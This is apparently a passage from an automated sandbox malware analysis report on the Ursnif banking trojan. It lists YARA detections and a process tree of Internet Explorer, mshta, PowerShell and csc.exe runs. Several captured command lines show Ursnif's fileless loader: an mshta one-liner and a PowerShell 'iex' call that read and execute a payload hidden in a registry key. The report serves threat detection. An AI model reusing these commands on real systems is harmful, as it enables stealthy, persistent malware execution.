                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:46:43
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                            Imagebase:0x7ff6ab5e0000
                                                                                                                                                            File size:823560 bytes
                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:46:44
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
                                                                                                                                                            Imagebase:0xb40000
                                                                                                                                                            File size:822536 bytes
                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:28
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                            Imagebase:0x7ff6ab5e0000
                                                                                                                                                            File size:823560 bytes
                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:29
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
                                                                                                                                                            Imagebase:0xb40000
                                                                                                                                                            File size:822536 bytes
                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:31
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
                                                                                                                                                            Imagebase:0xb40000
                                                                                                                                                            File size:822536 bytes
                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:34
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
                                                                                                                                                            Imagebase:0xb40000
                                                                                                                                                            File size:822536 bytes
                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:36
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
                                                                                                                                                            Imagebase:0xb40000
                                                                                                                                                            File size:822536 bytes
                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:43
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                                                                                                                            Imagebase:0x7ff6dddb0000
                                                                                                                                                            File size:14848 bytes
                                                                                                                                                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:44
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                                                                                                                            Imagebase:0x7ff6dddb0000
                                                                                                                                                            File size:14848 bytes
                                                                                                                                                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:45
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                                                                                                                            Imagebase:0x7ff785e30000
                                                                                                                                                            File size:447488 bytes
                                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:45
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:46
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                                                                                                                            Imagebase:0x7ff785e30000
                                                                                                                                                            File size:447488 bytes
                                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:46
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:57
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                                                                                                                                                            Imagebase:0x7ff62b250000
                                                                                                                                                            File size:2739304 bytes
                                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Start time:15:47:57
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                                                                                                                                                            Imagebase:0x7ff62b250000
                                                                                                                                                            File size:2739304 bytes
                                                                                                                                                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >